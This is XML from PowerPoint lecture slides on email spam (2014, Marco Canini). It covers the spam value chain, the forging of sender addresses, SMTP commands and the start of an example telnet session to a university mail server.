            <a:lvl8pPr marL="3200400" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Lecture slides adapted from UCL INGI2347 by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Gildas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Upenn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> CSE331 by Steve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Zdancewic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Reproduced with permission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 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682067" y="2514600"/>
            <a:ext cx="1947333" cy="1764000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 6"/>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934200" y="381000"/>
            <a:ext cx="1764000" cy="1770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3" name="Picture 2" descr="washingtoncourtsystem4_399010.jp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81000" y="1219200"/>
            <a:ext cx="4068000" cy="3055255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246315440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Infrastructure involved in a single URL’s value chain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="5867400"/>
            <a:ext cx="7677102" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Levchenko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> et al., Click Trajectories: End-to-End Analysis of the Spam Value Chain, 2011</a:t>
            </a:r>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1981200"/>
            <a:ext cx="9144000" cy="3475313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189992416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8" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Spamming Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Spamming Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The sender address is (almost) always forged to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>counterattacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Method 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Use of own/ISP SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>SMTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379907" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The protocol used by mail servers on the Internet is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Simple Mail Transfer Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RFC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>821, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1982</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>uses TCP connections on port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>knows a few simple commands such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HELO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (announces a server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAIL FROM:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(defines sender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RCPT TO:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(defines destination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATA:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(defines content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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SMTP example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1295400"/>
            <a:ext cx="5823955" cy="5255796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bash$ telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>smtp.sgsi.ucl.ac.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Trying 2001:6a8:3080:9:2::67...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Connected to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>smtp.sgsi.ucl.ac.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (2001:6a8:3080:9:2::67).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Escape character is '^]'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>220 smtp5.sgsi.ucl.ac.be ESMTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HELO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>smtp.sgsi.ucl.ac.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
